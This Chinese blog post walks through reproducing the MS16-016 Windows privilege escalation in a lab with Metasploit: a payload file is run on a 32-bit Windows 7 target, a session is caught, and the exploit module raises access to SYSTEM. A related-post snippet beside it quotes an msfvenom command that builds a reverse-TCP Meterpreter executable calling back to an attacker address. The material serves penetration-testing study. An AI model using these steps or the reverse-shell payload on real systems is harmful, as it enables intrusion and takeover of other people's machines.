通过msf复现漏洞ms16-016

已于 2024-03-20 11:41:58 修改
阅读量90 收藏
点赞数
文章标签: windows
于 2024-03-20 11:37:39 首次发布
原文链接:https://zhishixuebao.top
版权

漏洞描述

MS16-016漏洞的原理是基于Windows内核中的一个安全功能绕过问题。具体来说,这个漏洞涉及到Windows内核对于用户模式与内核模式之间的访问权限控制。攻击者可以利用特意构造的应用程序或网页来绕过这些权限控制,使得攻击者可以在系统内核态执行恶意代码,并且获取系统权限。

这个漏洞主要由两个方面组成:一是Windows内核对于用户模式与内核模式的通信机制出现了缺陷,使得攻击者可以进行越权操作;二是相关的安全功能没有正确地验证这些通信,导致了权限的绕过。

通过利用这个漏洞,攻击者可以执行未经授权的代码,获取系统敏感信息,或者潜在地导致拒绝服务情况。修复这个漏洞需要微软对Windows内核和相关的权限验证机制进行修复,以确保系统能够正确地限制和验证用户模式与内核模式之间的通信,从而防止类似的安全功能绕过问题。

靶机版本

Windows7 32位(msf无法复现64位系统)

利用过程

先生成一个payload

打开msfconsole设置监听端口

把payload.exe放入靶机当中,并双击打开

可以看到靶机已经上线

输入background把会话放入后台

设置msf中ms16_016exp的参数

获取到要注入的进程ID

输入sessions 1返回到payload中

输入shell,此时权限为管理员权限

退出shell,迁移进程,查看权限,此时位系统权限

 转载自博客:nyx - 渗透与测试

NAVI.electroNic
关注
ms16-016提权
qq_54713392的博客
05-08 1210
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
MS16-016漏洞复现
qq_45440239的博客
06-01 1819
复现MS16-016漏洞
利用MS16-016进行提权
NatusVincere
04-02 198
利用MS16-016进行提权
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 901
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
MS16-016 提权EXP
angaoux03775的博客
02-28 386
测试环境win732位未打任何补丁 1、使用netuser指令测试得到结果没有权限新建用户 2.查看系统用户 3、复制EXP到win7下使用命令打开添加新用户再查看用户列表 转载于:https://www.cnblogs.com/sevck/p/5225643.html...
MS16_016 漏洞利用与安全加固_exploit windows local ms16_016_webdav
2301_78398209的博客
04-11 854
MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。
[提权]MS16-016提权EXP
weixin_30621711的博客
01-12 1425
MS16-016提权EXP[K8]Tested On Win7 x86Usage: ms16-016_win7.exe "whoami"by K8拉登哥哥 20160216下载:http://pan.baidu.com/s/1c1r45c0 转载于:https://www.cnblogs.com/k8gege/p/10261356.html
如何使用MSF复现MS17-010漏洞
cc
03-27 878
MS17-010(永恒之蓝)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。存在漏洞的主机,只需要开放445端口即可被攻击,获取系统最高权限。
MSF漏洞复现
mackilo的博客
11-08 8425
ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息。
kali 使用 msf通过sm17_010漏洞拿到Windows shell
kk的博客
07-30 464
3、找到msf的工具目录,进入smb_ms17_101漏洞利用模块,使用search ms17_010查看可用模块、使用show optionsc查看可支持命令与参数。1、nessus扫描目标系统的IP拿到系统漏洞信息(存在ms11_030、ms17_010、ms16_047漏洞),本教程以ms17_010为例讲解。serach vce:VCE-2017-8464 type:exploit # 查找漏洞VCE-2017-8464的利用方法与模块。modules:存储metasploit的模块文件。
漏洞CNNVD-201805-248的复现与提权
weixin_43434933的博客
06-23 1106
实验原理介绍(图文) 本次实验实现漏洞CNNVD-201805-248的复现与入侵,以及后续的提权管理员和留后门操作。 漏洞基本信息: 漏洞名称:Microsoft Windows VBScript 引擎安全漏洞 CNNVD编号:CNNVD-201805-248 CVE编号:CVE-2018-8174 危害等级:高危 漏洞类型:缓冲区错误 威胁类型:远程 发布时间:2018-05-10 漏洞简...
MS16_016 漏洞利用与安全加固
theRavensea
03-18 860
MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。
网络安全kali web安全 Kali之msf简单的漏洞利用
Z4400840的博客
05-12 893
靶机的IP地址为:192.168.173.136利用nmap工具扫描其开放端口、系统等整理一下目标系统的相关信息系统版本:Windows server 2003。
MSF | 漏洞利用
君逍遥o
10-22 773
MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。
记一次ms16-032成功提权win7/win12
weixin_30608503的博客
04-03 530
E:\Tools\提权大结合\ms16-032>whoami pc-20140503jfge\administrator   首先查看权限是administrator 随后溢出 可以看到是system权限了 这是拿我本机试的。 可以在win12上成功溢出 exp不开源 转载于:https://www.cnblogs.com/wh4am1/p/6663998...
CVE-2016-0051(WebDaV)漏洞复现
yangbz123的博客
08-08 1664
MS16-016(WebDaV)漏洞复现 目标机:win7x64 192.168.235.142 攻击机:kali 192.168.235.137 1、 确定目标主机和攻击机能够ping通 2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端
漏洞复现】Metasploit下利用ms16-075提权
cj_Hydra's Blog
04-13 4050
前言: ms16-075漏洞介绍: Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应...
最详细利用kali的msf进行CVE-2019-0708漏洞复现
热门推荐
qq_43331608的博客
10-03 1万+
CVE-2019-0708 技术无罪,请勿用于恶意用途,出事本人不负一切责任 0.漏洞背景 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类...
Java小白一文讲清Java中集合相关的知识点(九)
最新发布
Kerwin_D的博客
09-12 850
Java小白一文讲清Java中集合相关的知识点(九)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值